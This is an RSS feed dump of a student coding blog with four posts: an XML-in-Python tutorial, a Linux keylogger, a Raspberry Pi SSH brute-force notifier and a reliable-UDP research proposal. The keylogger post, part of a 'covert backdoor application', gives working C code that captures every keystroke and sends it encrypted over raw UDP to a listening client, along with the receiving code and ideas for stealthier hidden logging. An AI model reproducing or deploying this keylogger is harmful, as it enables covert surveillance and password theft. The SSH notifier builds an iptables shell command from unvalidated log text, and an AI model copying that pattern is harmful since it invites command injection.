crush beer, crush code » coding http://crushbeercrushcode.org Sun, 24 Mar 2013 08:19:41 +0000 en-US hourly 1 http://wordpress.org/?v=3.5.1 Parsing and Generating XML in Python http://crushbeercrushcode.org/2013/03/parsing-and-generating-xml-in-python/ http://crushbeercrushcode.org/2013/03/parsing-and-generating-xml-in-python/#comments Sun, 03 Mar 2013 00:33:58 +0000 Daniel Khatkar http://brogramming.org/?p=605 Alright bros, I finally got around to writing a post. I will be going through the process of how to parse and generate an XML document in Python. Both of these are fairly simple and extremely useful, considering the amount of XML documents you may come across in school or at work.

Parsing XML

The XML file we will be parsing and generating can be seen below.

1
2
3
4
5
6
7
8
<note>
        <to>Luke</to>
        <to>Dan</to>
        <from>Kalen</from>
        <heading title="Reminder">
                <body>Don't forget to study!</body>
        </heading>
</note>

The first thing you will want to do is import the Python library that provides functions to parse the XML file. The Python library that I found to be the easiest to use is the “xml.dom” library, which is included with your Python install. Depending on what your Python coding style is, you can import this library many ways. I chose to only import the “minidom” class, because this is the only one you need, but you can import the whole library if you wish.

1
 from xml.dom import minidom

Once you have imported the library, we can begin coding. The first thing you must do is, create the “minidom parser”. You must supply the path of the xml file when instantiating this object. In the example below I have set this object to a variable named “xmldom”. To grab an XML element within the file it is as simple as using the getElementsByTagName(“nameOfElement”) method with your minidom object. This method returns a list which will vary in length depending on how many of those elements are within your XML document. In the XML file above, there is are two “to” elements, so when we get an element by the name “to”, the returning list will be a length of 2.

To get the actual values of each element, we will need to iterate through the returning list. This can be done with a for loop. If you know that there is only one element to be returned from the XML document, you can access it directly, without a for loop. This can be seen in the section of the code below commented “Get and print each elements value”

To get an attribute of an element, you must first get the element by its name and then access the attribute. This can be seen in the section of the code below, commented with “Get Attribute”. Since there is only one “heading” element, it is accessed directly instead of a for loop, like I stated you can do earlier.

As seen in the example XML Document above, the “heading” element also has a child node. To access that child node, you will first have to get the list of “heading” elements, then get the list of child nodes. This can be seen in the code below, under the commented section “Get Child Elements”. Notice how I am accessing the headings list directly here again, if there were more “heading” elements I would have to use a for loop.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
def parse_xml():
    xmldom = minidom.parse(tool.xml_path)
 
    #Get "to" Element
    to_list = xmldom.getElementsByTagName("to")
 
    #Get and print each elements value.
    for each in to_list:
       print each.childNodes[0].nodeValue
 
    #Get Attribute
    headings_list = xmldom.getElementsByTagName("heading")
    title = heading_list[0].getAttribute('title')
    print title
 
    #Get Child Elements
    headings_list = xmldom.getElementsByTagName("heading")
    child_list = headings_list[0].getElementsByTagName("body")
    print child_list[0].childNodes[0].nodeValue

Generating XML

Generating XML is even simpler than parsing. The library that I use to generate an XML document is the lxml library and ElementTree class. It is also included in your Python install. The code below shows how to import it.

1
from lxml import etree as ET

The code below shows how to generate the XML Document provided at the top of this post. You will first need to create a root Element object and add Sub Element objects to it. The Element object takes the name of your root element. The Sub Element object takes the parent element of that sub element as a first argument and the name of that sub element as the second. You can set the value of each element with the “text” variable. You can also set attributes to each element using the “set” method, which takes the name of the attribute as the first argument and the value of that attribute as the second. To generate the XML string, you will need to create an ElementTree object by passing the root element. After doing this you can pass that ElementTree object to a “tostring() method. I provide the “pretty_print=True” option to the tostring() method so the XML document os formatted correctly.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
def generate_xml():
    root = ET.Element("note")
    to = ET.SubElement(root, "to")
    to.text = "Luke"
    to = ET.SubElement(root, "to") 
    to.text = "Dan"
    from_var = ET.SubElement(root, "from")
    from_var.text = "Kalen"
    heading = ET.SubElement(root, "heading")
    heading.set("title", "Reminder")
    body = ET.SubElement(heading, "body")
 
    tree = ET.ElementTree(root)
    xml_string = ET.tostring(tree, pretty_print=True)
    print xml_string

And it is as easy as that! Hopefully someone finds these steps useful, enjoy your coding.

]]>
http://crushbeercrushcode.org/2013/03/parsing-and-generating-xml-in-python/feed/ 2
Linux Key Logger http://crushbeercrushcode.org/2013/01/linux-key-logger/ http://crushbeercrushcode.org/2013/01/linux-key-logger/#comments Sun, 06 Jan 2013 22:31:27 +0000 Luke Queenan http://brogramming.org/?p=449 As part of my covert backdoor application, I created a key logger for a Linux system written in C. The application was designed to capture global keystrokes and send them back to a listening client using UDP (over raw sockets) in real time. The payload, containing the key press, is encrypted to prevent someone from casually viewing the key stokes during transmission. Since this was primarily a proof of concept application, there are a few limitations: the application requires root access (for reading the keyboard event file and for raw sockets), the keyboard event file needs to be hard coded, and the key logging process runs in an infinite loop.

This article will discuss the following points:

  • capturing keystrokes
  • creating, encrypting, and sending the UDP packet
  • receiving and displaying the keystrokes on the client
  • further improvements

Capturing Keystrokes

The first step in capturing keystrokes is determining which event file is associated with the keyboard on the compromised system. This can be found by opening a terminal and entering the following commands:

1
2

The output of the last command will show the symbolic links for the devices on the computer. You are obviously interested in the keyboard, so make note of the event associated with it. For example, the system I used had /dev/input/event2 mapped for the keyboard. One more thing to note before we go into the details of capturing the key presses is the format of the events we will read from the event file. Whenever a key is pressed on the system, this event is generated. The events take the following format:

struct input_event {
    struct timeval time;
    __u16 type;
    __u16 code;
    __s32 value;
};

The following code snippet contains functionality for capturing the key presses. My inline comments should explain most of the code, but the important sections will be discussed below.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
void keylogger()
{
#ifdef __linux__
    int keyboard = 0;
    int count = 0;
    int eventSize = sizeof(struct input_event);
    int bytesRead = 0;
    int socket = 0;
    char *buffer = NULL;
    struct input_event event[64];
    struct parseKey *key = NULL;
    struct sockaddr_in din;
 
    // Create the raw socket
    if ((socket = createRawUdpSocket()) == 0)
    {
        return;
    }
 
    // Create the packet structure
    buffer = createRawUdpPacket(&din);
 
    // Open the keyboard input device for listening
    keyboard = open(KEYBOARD_DEVICE, O_RDONLY);
    if (keyboard == -1)
    {
        systemFatal("Unable to open keyboard");
        return;
    }
 
    // Start logging the keys
    while (1)
    {
        // Read a keypress
        bytesRead = read(keyboard, event, eventSize * 64);
 
        // Loop through the generated events
        for (count = 0; count < (bytesRead / eventSize); count++)
        {
            if (EV_KEY == event[count].type)
            {
                if ((event[count].value == KEY_PRESS) || (event[count].value == KEY_HELD))
                {
                    // Find the correct name of the keypress. This is O(n) :-(
                    for (key = keyNames; key->name != NULL; key++)
                    {
                        if (key->value == (unsigned) event[count].code)
                        {
                            // Send the key out
                            sendKey(key->name, socket, buffer, &din);
                            break;
                        }
                    }
                }
            }
        }
    }
#endif
}

The first step is to open the event file for reading, which is done on line 24, by passing the path to the event file you got earlier. After opening the file, we can start reading events from it. Once we have a successful read, we loop through the returned events and perform a few checks to ensure that we are dealing with key press and key held events. Once we have a key press, we linearly search through a file containing the integer value and the associated key name. This provides a human readable output, such as KEY_K and KEY_L. Once we have the key name, it’s time to send it to the client.

Sending Keystrokes

The keystrokes are sent back to the client through a raw socket in the UDP payload. The string is encrypted to prevent a casual observer from determine the contents of the packet. The code snippet below demonstrates encrypting the key press string, adding it to the UDP packet, and sending it to the client over a raw socket. The creation of the IP and UDP packets is not included here.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
static void sendKey(char *keyName, int socket, char *buffer, struct sockaddr_in *din)
{
    int packetLength = 0;
    int udpLength = 0;
    int zero = 0;
    int keyLength = 0;
    char date[11];
    char *encryptedField = NULL;
    char *key = NULL;
    struct tm *timeStruct = NULL;
    unsigned short sum = 0;
    time_t t;
 
    // Get the time structs ready
    time(&t);
    timeStruct = localtime(&t);
    strftime(date, sizeof(date), "%Y:%m:%d", timeStruct);
 
    // Get our local information, add 1 for the NULL byte
    key = strndup(keyName, 31);
    keyLength = strnlen(key, 30) + 1;
    packetLength = sizeof(struct udphdr) + keyLength;
 
    // File in the UDP length
    udpLength = htons(packetLength);
    memcpy(buffer + sizeof(struct ip) + 4, &zero, sizeof(unsigned short));
    memcpy(buffer + sizeof(struct ip) + 4, &udpLength, sizeof(unsigned short));
 
    // Fill in the IP length
    packetLength += sizeof(struct ip);
    memcpy(buffer + 2, &zero, sizeof(unsigned short));
    memcpy(buffer + 2, &packetLength, sizeof(unsigned short));
 
    // Encrypt and append the keypress and a NULL byte
    encryptedField = encrypt_data(key, date, keyLength + 1);
    memcpy(buffer + sizeof(struct ip) + sizeof(struct udphdr), encryptedField, keyLength);
 
    // Calculate the IP checksum
    memcpy(buffer + 10, &zero, sizeof(unsigned short));
    sum = csum((unsigned short *)buffer, 5);
    memcpy(buffer + 10, &sum, sizeof(unsigned short));
 
    // Send the packet out
    sendto(socket, buffer, packetLength, 0, (struct sockaddr *)din, sizeof(struct sockaddr_in));
 
    // Cleanup
    free(key);
}

The hardest part with creating the packet is counting out the correct number of bits when using memcpy to ensure the right field is filled out. Other than that it’s pretty straight forward. The encryption is done using the date to ensure that the encryption is somewhat random from day to day.

Receiving Keystrokes

Receiving the keystrokes on the client makes use of libpcap which provides a framework for low level packet capturing. This allows me to set a tcpdump filter on a network interface card and listen for packets. Once a packet that matches the filter is captured, a callback function is used to deal with the packet. The code snippet below is the callback function used by the client.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
void receivedPacket(u_char *args, const struct pcap_pkthdr *header, const u_char *packet)
{
    const struct ip *iph = NULL;
    char *data = NULL;
    char *payload = NULL;
    int ipHeaderSize = 0;
    unsigned short payloadSize = 0;
 
    // Get the IP header and offset value
    iph = (struct ip*)(packet + SIZE_ETHERNET);
#ifdef _IP_VHL
    ipHeaderSize = IP_VHL_HL(iph->ip_vhl) * 4;
#else
    ipHeaderSize = iph->ip_hl * 4;
#endif
 
    if (ipHeaderSize < 20)
    {
        return;
    }
    // Ensure that we are dealing with one of our sneaky TCP packets
#if defined __APPLE__ || defined __USE_BSD
    if (iph->ip_p == IPPROTO_TCP)
#else
    if (iph->protocol == IPPROTO_TCP)
#endif
    {   
        // Get the data and display it
        payload = malloc(sizeof(unsigned long));
        memcpy(payload, (packet + SIZE_ETHERNET + ipHeaderSize + 4), sizeof(unsigned long));
        data = getData(payload, sizeof(unsigned long));
        printf("%.4s", data);
    }
#if defined __APPLE__ || defined __USE_BSD
    else if (iph->ip_p == IPPROTO_UDP)
#else
    else if (iph->protocol == IPPROTO_UDP)
#endif
    {        
        // Get the size of the payload
        memcpy(&payloadSize, (packet + SIZE_ETHERNET + ipHeaderSize + 4), sizeof(unsigned short));
        payloadSize = ntohs(payloadSize);
        payloadSize = payloadSize - sizeof(struct udphdr);
 
        // Get the payload
        payload = malloc(sizeof(char) * payloadSize);
        memcpy(payload, (packet + SIZE_ETHERNET + ipHeaderSize + sizeof(struct udphdr)), payloadSize);
 
        // Get the data and display it
        data = getData(payload, payloadSize);
        printf("%s\n", data);
    }
    free(payload);
}

The section we are concerned about in this article is the UDP section starting on line 34. Once we are sure we have a UDP packet, we determine the size of the payload. Using this value, a memcpy is performed to remove the data from the packet. The data is decrypted using the date and then printed to the console. The screenshot below shows a demonstration of the client receiving and printing keystrokes to the screen.

client-keylogger

Further Improvements

Like I mentioned at the beginning of the article, this was primarily a proof of concept key logger due to time constraints. There are a number of improvements I would make to the program to make it more versatile and usable.

  • Implement the reading in a separate thread. The separate thread will free the rest of the backdoor application so that it can respond to additional commands from the client program. The key logger thread would also be controlled by the backdoor application, meaning that it can be shutdown and restarted at any time by the client.
  • Create a mode where key presses are saved to a hidden file instead of being immediately transmitted back to the client. This would be useful for scenarios where a more stealthy approach is needed, as opposed to the real time key logging.
  • Implement a map for storing the key names for a faster loop up, O(1) instead of O(n).
  • Save the key presses to a file on the client instead of just printing them to the screen.

The full covert backdoor application can be found on my github.

]]>
http://crushbeercrushcode.org/2013/01/linux-key-logger/feed/ 1
Raspberry Pi SSH LED Notification http://crushbeercrushcode.org/2012/12/raspberry-pi-ssh-led-notification/ http://crushbeercrushcode.org/2012/12/raspberry-pi-ssh-led-notification/#comments Wed, 26 Dec 2012 23:48:17 +0000 Kalen Wessel http://brogramming.org/brogramming/?p=412 With finals over and semester break a go, I finally have found some time to play around with my second Raspberry Pi. The Raspberry Pi is a great piece of hardware with endless potential for projects. My first rpi has been setup as a dedicated media box, so using it for development purposes wasn’t an option; thankfully these little credit card size computers run $50 a pop so ordering another one wasn’t a big deal.

I have never dabbled in circuity design, so I figured the rpi would make for good basis. The RPI has GPIO (General Programming Input Output) pins. These pins allow for sensors, LCD devices, LEDs and other peripherals to be connected to it.

Since keeping track of which pins are what on the rpi can be a PITA, I decided to pick up a cobbler adapter from ADAfruit since it nicely labels what each pins is (5V, 3V, 26, 13, etc) and plugs into a breadboard easily. cobber-breadboard

Now that I had a way to send signals to and from the breadboard, it was time to start designing my first mini-project. SSH is a service I am constantly using so I wanted to build something around that. That’s when I came up with the idea of an SSH notifier. Using a already provided GPIO library, I coded up a simple SSH brute force notifier that allowed me to visually see potentially malicious traffic.

How it works:

As SSH login attempts occur, the process constantly keeps watching for failed login attempts by reading the last three lines of the access log. If it captures 3 failed login attempts in a row from the same IP address, it triggers a red LED for 30 seconds as well as adds a DROP rule in iptables for the offending IP address. After the LED is turned off, it waits for 30 seconds before checking the logs again. To avoid banning the same IP over and over again, there is a condition which checks to make sure that the last IP to be checked is not the same as the IP just banned.

After executing the SSH notifier

pi@raspberrypi ~ $ tail -f /var/log/auth.log
Dec 26 07:28:06 raspberrypi sshd[7438]: pam_unix(sshd:session): session opened for user pi by (uid=0)
Dec 26 07:28:08 raspberrypi sudo:       pi : TTY=pts/0 ; PWD=/home/pi ; USER=root ; COMMAND=/bin/grep pi /etc/shadow
Dec 26 07:28:08 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by pi(uid=0)
Dec 26 07:28:08 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
Dec 26 07:28:19 raspberrypi sudo:       pi : TTY=pts/0 ; PWD=/home/pi ; USER=root ; COMMAND=/sbin/iptables -L
Dec 26 07:28:19 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by pi(uid=0)
Dec 26 07:28:19 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
Dec 26 07:43:23 raspberrypi sshd[5919]: pam_unix(sshd:session): session closed for user pi
Dec 26 08:17:01 raspberrypi CRON[7483]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec 26 08:17:01 raspberrypi CRON[7483]: pam_unix(cron:session): session closed for user root
Dec 26 08:35:27 raspberrypi sshd[7499]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=berlin.local  user=root
Dec 26 08:35:29 raspberrypi sshd[7499]: Failed password for root from 192.168.1.122 port 58201 ssh2
Dec 26 08:35:32 raspberrypi sshd[7499]: Failed password for root from 192.168.1.122 port 58201 ssh2
Dec 26 08:35:34 raspberrypi sshd[7499]: Failed password for root from 192.168.1.122 port 58201 ssh2
Dec 26 08:35:36 raspberrypi sshd[7499]: Failed password for root from 192.168.1.122 port 58201 ssh2
Dec 26 08:35:39 raspberrypi sshd[7499]: Failed password for root from 192.168.1.122 port 58201 ssh2

We can see that there are more than 2 failed login attempts so as soon as the script runs it will pick up the last 5 lines, check for 3 failed passwords and ban the IP address which is depicted in the images below.

ssh-notification process

iptables

With the process running in the background, it will continue to check the logs for brute force attempts and warn me with a visual notification.

Video Demonstration:

Code:

led.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import RPi.GPIO as GPIO, time
import sys
 
GPIO.setmode(GPIO.BCM)
 
# Takes a pin number from the GPIO
def turnOn(pin):
    LED_pin = pin
    #LED_color = led
    GPIO.setup(LED_pin, GPIO.OUT)
    GPIO.output(LED_pin, True)
    return
# Takes a pin number from the GPIO
def turnOff(pin):
    LED_pin = pin
    #LED_color = led
    GPIO.setup(LED_pin, GPIO.OUT)
    GPIO.output(LED_pin, False)
    return
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
#!/usr/bin/env python
# SSH Monitor with LED notification
 
from led import turnOn, turnOff
import array
import time
import os
import re
 
# Set the SSH log file director
logfilepath = "/var/log/auth.log"
 
# Function which reads the last 10 lines of a file.
def readFromEnd( f ):
    BUFSIZ = 1024
    f.seek(0, 2)
    bytes = f.tell()
    size  = 10
    block = -1
    data  = []
    while size > 0 and bytes > 0:
        if (bytes - BUFSIZ > 0):
            # Seek back one whole BUFSIZ
            f.seek(block*BUFSIZ, 2)
            # read BUFFER
            data.append(f.read(BUFSIZ))
        else:
            # file too small, start from begining
            f.seek(0,0)
            # only read what was not read
            data.append(f.read(bytes))
        linesFound = data[-1].count('\n')
        size -= linesFound
        bytes -= BUFSIZ
        block -= 1
    return ''.join(data).splitlines()[-size:]
 
attempts   = 0
ip         = []
match      = 0
culprit_ip = 0
 
while True:
	turnOn(18)
	#failedLogin = 2
	file = open(logfilepath, "r")
	# Print one line at a time
	data = readFromEnd(file)
	# Check through the list array
	if (attempts < len(data)):
 
		for num in range(0,10):
			if (data[num].find("Failed password") > 0):
				temp = data[num]
				ip = re.findall( r'[0-9]+(?:\.[0-9]+){3}', temp)
 
			ip_check = re.findall( r'[0-9]+(?:\.[0-9]+){3}', data[num])
			#print data[num]
			if ((ip == ip_check) and (str(ip).strip('[]') != culprit_ip) and (data[num].find("Failed password") > 0)):
				print ("Match", match, data[num])
				match    += 1
				attempts += 1
			elif ((ip == ip_check) and (str(ip).strip('[]') != culprit_ip) and (data[num].find("Accepted password") > 0)):
				match    = 0
				attempts = 0
			# Check for 3 failed brute force attempts in a row.
			# When that condition is met it activates the LED
			if (match == 3):
				culprit_ip = str(ip).strip('[]')
				print "Potential brute force attempt from", culprit_ip
				# reset match count
				match = 0
				# reset attempts
				attempts = 0
				turnOff(18)
				turnOn(23)
				# Ban IP from server using iptables
				print "Banning IP: ", culprit_ip
				os.system("iptables -A INPUT -s "+culprit_ip+" -j DROP")
				time.sleep(30)
				turnOff(23)	
		match    = 0
		attempts = 0
	print "Searching again"
	time.sleep(5)
]]>
http://crushbeercrushcode.org/2012/12/raspberry-pi-ssh-led-notification/feed/ 1
Reliable UDP – Research Proposal http://crushbeercrushcode.org/2012/12/reliable-udp-research-proposal/ http://crushbeercrushcode.org/2012/12/reliable-udp-research-proposal/#comments Sun, 23 Dec 2012 07:46:13 +0000 Luke Queenan http://brogramming.org/brogramming/?p=430 This is a research proposal I wrote for one of my classes at BCIT. UDP, while extremely fast, is not a reliable program in the sense that the sender has no way of knowing if a packet has been received. This proposal examines various other attempts at making UDP reliable and then suggests a new technique.

Problem Statement

UDP is not a reliable protocol due to the absence of acknowledgments, retransmissions, or timeouts and ordering of received datagrams.

Sub-Problems

  1. The UDP protocol (User Datagram Protocol) could be made reliable by implementing, at the very least, a packet acknowledgement system
  2. Making the protocol reliable must not cause an overly adverse effect on the speed of the protocol.
  3. The protocol will need to actively take advantage of the available throughput on the communication line.

The Hypotheses

It is hypothesized that UDP can be made reliable while maintaining its overall speed and making use of a given network line’s maximum throughput.

Delimitations

The proposal will not go into the details of congestion and flow control design and existing algorithms.

The proposal will not go into the details of constructing the actual protocol.

The study will not discuss the actual coding implementations of the protocol.

Definition of Terms

Reliability: Reliability means that the protocol would make a “best effort” to deliver the data being transferred using acknowledgments of received packets, retransmissions of un-acknowledged packets, timeouts for lost connections and retransmission timings, ordering of datagrams, and congestion / flow control.

Throughput: Throughput is number of successfully delivered packets over a given time on a network line.

MD5 Checksum: The Message Digest Algorithm checksum is used to verify the validity of downloaded file. After running the algorithm on the file, the output should match the result of running the algorithm on the original file. If it does not, the file is corrupted in some way.

Assumptions

The first assumption is that the reader has some basic knowledge regarding the TCP and UDP protocols and their uses.

The second assumption is that the reader knows terms related to the internetworking field.

Importance of the Study

TCP is plagued by congestion and flow control issues on network lines where the length and delay is long and on lines where there is packet loss. Thus, TCP does not always make efficient use of the line’s maximum throughput. Building on the speed of the User Datagram Protocol by implementing reliability would increase the average throughput

Existing Literature

The following five literature reviews support and demonstrate various aspects of the hypothesis.

The research article entitled “A Reliable UDP for Ubiquitous Communication Environments” outlines the creation of a reliable UDP, or RUDP. The goal was to construct a fast and reliable communication protocol in comparison to an ordinary TCP connection for communication between terminal devices and their servers. In this environment, the terminal devices initiate the communication to the server and maintain this session for a short duration in comparison to TCP. In this sense the communication is event driven, so the maximum number of simultaneous connections to the server should not exceed the number of connected devices. Note that the RUDP protocol does not implement any form of data flow management, which means that it does not attempt to deal with congestion issues it may encounter. In order to achieve reliable delivery of packets, the RUDP protocol uses the following:

  • A three way handshake similar to TCP where a sessionID is created.
  • The sessionID is then used for further communication.
  • A timeout if no ACK is received to recover from packet loss.

After developing the RUDP protocol with these requirements, a comparison test was done between TCP and RUDP. The first test consisted of a client creating up to 12500 threads, each creating packets and connecting to the server. This was done for both TCP and RUDP. The results show that even with the addition of a connection setup and packet retransmission on top of UDP, the protocol is much faster than TCP, usually between a factor of three to twelve times. There was some noted packet loss under heavier traffic, but this never resulted in performance degradation even with the retransmission of lost packets. The TCP connection was also unable to process more than 4000 packets at a time due to the large number of sessions, but the RUDP protocol was not impacted by this and could handle 12500 simultaneous packets. The second test showed that even in-creasing packet sizes maintained the RUDP protocol’s four times speed in-crease over TCP. Once packet sizes reached 16384 bytes, both protocols reached their limitation due to saturating the network bandwidth. The article concludes that a reliable UDP protocol can be made while still maintaining speed. They found that under test conditions, the protocol was at least four times faster than that of TCP. The results of this article show promise for a UDP protocol that implements reliability through ACKs and retransmissions along with data flow management for increased reliability and robustness.

In the article “Performance Analysis of Reliable Dynamic Buffer UDP over Wireless Networks”, the authors pro-pose a more sophisticated method of ensuring UDP reliability. This method is aimed at maintaining the raw speed of UDP by implementing a Reliable Dynamic Buffer instead of the standard ACK and retransmission schemes. The article states that the existing reliable protocols, TCP and SCTP, do not meet the speed requirements needed for complex wireless networks. Given the higher error rate, wireless link costs, host mobility, longer delay, and lower bandwidth on wireless networks, a reliable protocol is needed. Therefore, they propose making the aforementioned improvement to UDP to meet this requirement. The Reliable Dynamic Buffer UDP entails adding an additional header to the data portion of the standard UDP header. This new header contains the following four fields.

  • Sequence Number, similar to TCP’s sequence number where the initial value is randomized when the connection is opened.
  • ACK Number, again similar to TCP’s ACK number where the last received packet is acknowledged.
  • Buffer Size, indicates to the receiver the number of bytes to reserve for out of order packets before the expected packet arrives.
  • A Checksum, which uses the same algorithm, used on UDP and TCP headers.

The article then goes on to make a comparison between the Reliable Dynamic Buffer UDP and Reliable UDP in terms of network throughput and delay in wireless networks. The test consisted of one wireless sending node and one wireless receiving node. The results of the test showed that the RDBUDP protocol outperformed the RUDP protocol in both aspects. The throughput test demonstrates the weakness of using ACKs, as the throughput is not smooth and jumps around quite a bit. It is also worth noting that neither of the protocols can actually reach the total throughput of the link. In terms of delay time, the RDBUDP protocol just barely outperforms the RUDP protocol. The article concludes that in terms of network throughput and delay in wireless networks, the Reliable Dynamic Buffer UDP outperforms the Reliable UDP. Unfortunately they do not provide any data on pure transfer rates. Further research would have to be done to determine if the RDBUDP outperforms the RUDP in other aspects as well. Given the complexity of implementing the RDUDP, using the buffer method may not provide enough benefits over straight RUDP.

The research article “SABUL: A High Performance Data Transfer Protocol” describes a protocol that uses both TCP and UDP to transfer control messages and data respectively. The article begins by outlining the issues with data transfers over TCP, especially with high bandwidth, long delay networks. In order to overcome these challenges, the research team designed a new protocol called SABUL, or Simple Available Bandwidth Utilization Library. It has the following seven objectives.

  • Reliable data transfer
  • Application level implementation
  • Minimal impact on computing re-sources
  • Maximum utilization of available bandwidth
  • Respond to network changes
  • Share bandwidth with other connections
  • Memory copy avoidance

The protocol is unidirectional in terms of the following; data flow is one way from the sender to the receiver over UDP, while control information is sent one way from the receiver to the sender over TCP. The protocol’s functionality is relatively simple. The only modification made to the UDP packet is the addition of a 32 bit sequence number used for packet ordering and acknowledgements. The control connection responds to the sender throughout the data transfer with one of three types of packets.

  • ACK: This packet acknowledges that all the packets up to the provided sequence number have been received.
  • ERR: This packet is used as a negative acknowledgment for the provided sequence number.
  • SYN: This packet is used to control sending rates and flow control.

Since the purpose of the SABUL protocol was to transfer data over high bandwidth and long delay networks, the performance testing done by the re-searches is all over these types of net-works. The results show that on half of the networks the protocol was tested on, it outperformed TCP and UDP in terms of throughput. On the other two net-works, it underperformed in comparison to standard TCP and UDP. However, the researchers believe that this was due to the CPU limits on the machines since the SABUL protocol requires more overhead. The hybrid approach of combining UDP and TCP to create a reliable network is an interesting approach. Building on the inherent reliability of TCP to ensure that control information is received allows for a simpler and smaller UDP packet allowing for more data to be transferred. This also scales well with a multithreaded approach to sending data since there are two independent connections. Further tests could be done with this protocol over normal networks to compare its speed with that of RUDP.

In the next literary review, entitled “Reliable Blast UDP: Predictable High Performance Bulk Data Transfer”, the researchers propose a protocol for transferring bulk amounts of data. This protocol, similar to the SABUL protocol, is designed to operate on long distance, high speed, high latency connections and not the general internet. However, like with the SABUL protocol, some interesting ideas are brought forward that further develop the idea of a reliable general use UDP protocol. The Reliable Blast UDP protocol discussed in the article uses a dual protocol approach. Essentially, a file is transmitted over the UDP connection in full while the receiver keeps track of which packets it has received. Upon finishing the file transfer, the sender sends a “done” command to the receiver over a TCP control connection. The receiver responds with an “acknowledgment” along with a bitmap tally of the received packets. The sender resends the missing packets and this process repeats until all the packets have been received. To minimize the loss of UDP packets, the send rate must not exceed the lowest bandwidth on the link and a relatively fast machine is required to receive the UDP packets in a timely fashion. The tests performed by the researchers show that packet loss can be as low as 2-7% when the available bandwidth is calculated correctly. There were three different RBUDP protocols designed, each having a different focus for storing and ordering the received packets. The three versions are broken down as follows:

  1. RBUDP with Scatter/Gather Optimization: this version assumes that most packets will be received in the correct order and that few packets will be lost due to the bandwidth calculations. Packets are first stored in memory assuming this, then checked and only moved if they are out of position.
  2. RBUDP without Scatter/Gather Optimization: this version checks each packet as it comes in and stores it in the correct location.
  3. Fake RBUDP: this version does not move packets and is just used to measure the overhead of RBUDP in comparison to standard UDP.

The researchers concluded that RBUDP, when used with Scatter/Gather Optimization, functioned the best under most circumstances and will scale with faster networks. They also found that the protocol obtained the best results when used with large bulk transfers. This is due to the fact that receiving an acknowledgment through the TCP channel takes almost as long as the actual file transfers when using smaller files. The results of this study show that the performance of a dual protocol approach, using UDP for data and TCP for control signals, is tied to the speed at which acknowledgments can be returned to the sender over the TCP channel. Further research will have to be done to determine where the optimal balance is, and whether this technique would be a viable solution in creating a reliable UDP protocol for the general internet.

The final research article in this re-view, “A Class of Reliable UDP-based Transport Protocols Based on Stochastic Approximation”, the researchers pro-pose a different and more in-depth solution to the reliable UDP problem. The paper begins by describing the problems associated with the current TCP and UDP setup. TCP is not performing well due to low throughputs as a result of AIMD, or Additive in-crease/Multiplicative decrease. This is the algorithm used to control the flow of packets during a TCP connection. The outstanding issues with this design is that it does not stop reducing its throughput as long as there are packet loses, even if there are only a few. Thus, throughput is usually below its optimal value with TCP, more so over lines with high bandwidth and long delay. With UDP the problem is reliability, as discussed in the beginning of this proposal. The researchers also address some of the other reliable UDP protocols created, such as SABUL and RBUDP, both discussed previously. While both these protocols utilize available bandwidth far better than standard TCP, the nature in which they do this does usually starves other TCP traffic of bandwidth. There-fore, the researchers propose a new protocol, Reliable UDP-based Network Adaptive Transport, or RUNAT, based on UDP that has a TCP friendly flow control while still maintaining the fast speeds of UDP. In order to achieve this, the protocol implements a floating window-based transport model and uses a rate control strategy that is broken into three zones, outlined below.

  1. Packet loss rate is low; transmission speed should be increased.
  2. Maximum throughput with a non-zero loss rate.
  3. Packet loss rate is high; trans-mission speed should be decreased.

The optimal zone is the center zone (two), with the edge zones (one and three) each attempting to push the throughput into the center zone. Once in the center zone, traffic is kept there using the dynamic Kiefer-Wolfowitz Stochastic Approximation method to control transmission speed. This method takes into account the randomness of network traffic and adjusts for it. The mathematics behind it is out of the scope of this proposal. The researchers went on to perform some tests using RUNAT on various different links. All the tests concluded that the protocol was easily able to adjust and make the most use of the available bandwidth on each link. The results show that RUNAT uses 2-5 times the throughput in comparison to TCP without negatively affecting concurrent traffic on the line. This study brings up some interesting points in regards to the congestion and flow control required in a reliable UDP protocol. If this new protocol is required to share the line with existing traffic, then it needs to take this into account and not obliterate other traffic due to its burst speed.

Data Collection

The data collection must obtain data on the protocol’s reliability in delivering packets, speed in comparison to UDP and TCP, along with the protocol’s ability to take advantage of the available throughput on the line. This will consist of an Observational study, where the protocols are observed systematically while maintaining objectivity. There will be two different test beds in order to test the protocol over two different types of network lines.

  1. This test bed will consist of two machines, a server and a client, separated by an intercontinental link. This will test the protocol over a link that has a high bandwidth and long delay.
  2. This second test bed will consist of two machines, a server and a client, connected on an isolated network using a switch. This will provide a setting more often found in most local area networks.

Data will be obtained from these test beds as objectively as possible. To ensure this, the following limits will be put in place.

  • Reliability will be measured by performing a MD5 sum on the completed file transfer.
  • The maximum available throughput for TCP and UDP on a network line will be measured using Iperf.
  • The throughput of the new protocol will be measured using the complete transfer time and a tally of successfully received packets.

Methodology

This study is intended to develop a reliable UDP protocol that takes full advantage of a network line’s available throughput while maintaining the overall speed of UDP. An observational research methodology will be followed in testing this newly designed protocol against the requirements put forward in this proposal.

